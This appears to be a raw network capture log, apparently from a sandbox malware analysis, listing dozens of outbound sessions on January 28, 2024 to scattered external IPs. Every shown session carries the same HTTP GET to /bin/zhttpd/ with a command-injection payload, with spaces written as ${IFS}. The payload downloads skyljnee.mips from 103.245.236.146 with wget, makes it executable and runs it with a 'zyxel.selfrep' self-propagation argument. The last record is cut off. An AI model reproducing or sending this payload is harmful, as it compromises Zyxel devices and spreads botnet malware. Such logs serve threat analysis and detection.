                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.143820882.68.232.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145817995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.1448006160.12.130.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145858049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.1446312206.144.76.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145905018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.144091445.58.255.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145942926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.144145049.177.231.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145971060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.144700217.150.26.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146018982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.14554829.121.88.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146042109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.1437474150.190.176.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146095037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.145478835.22.144.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146121025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.1452762176.57.214.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146159887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.1448000148.145.218.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146198988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.1435510111.72.105.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146229029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.144376467.113.101.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146265030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.1437196136.4.146.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146310091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.143751083.52.237.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146342993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.145505438.47.172.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146392107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.144004860.118.194.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146430016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.1447414134.89.162.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146457911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.1448912205.159.206.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146488905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.1445038128.74.240.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146539927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.1447488130.54.110.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146569967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.1443318137.183.80.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146615982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.1437798216.200.92.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146656036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.146077057.65.244.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146689892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.1433634101.189.173.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146728039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.145289244.78.141.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146749973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.145500839.84.3.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146807909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.1433840139.116.18.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146842957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.1432984196.2.82.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146867990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.1441382223.105.118.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146913052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.146009624.226.75.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146943092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.143954270.65.26.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.146987915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.1459360120.198.231.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147038937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.1437702105.169.88.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147068024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.1443630191.41.230.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147090912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.144019025.83.24.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147126913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.1440618185.163.173.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147155046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.145379296.61.134.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147202969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.143716478.199.133.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147248030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.1433382218.10.15.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147284031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.1448814129.84.253.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147327900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.143814818.156.187.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147355080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.143966619.227.118.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147382975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.143842417.160.105.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147429943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.1438860202.1.7.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147459030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.1455250218.205.106.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147526026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.1452690165.108.125.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147548914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.1450586201.41.113.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147586107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.1451322208.50.169.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147638083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.1453336198.9.233.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147677898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.1435046146.248.3.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147716999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.145906296.203.36.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147753000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.1442454120.153.29.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147810936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.1439512217.64.197.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147846937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.1452350199.83.216.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147882938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.143469662.43.180.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147916079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.1441460194.67.133.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147963047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.1451316145.230.90.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.147986889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.1446384142.90.83.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148036957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.143651087.236.240.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148060083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.1460760212.58.157.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.148097992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.1433420171.81.31.43443
                                                        TimestampBytes transferredDirectionData
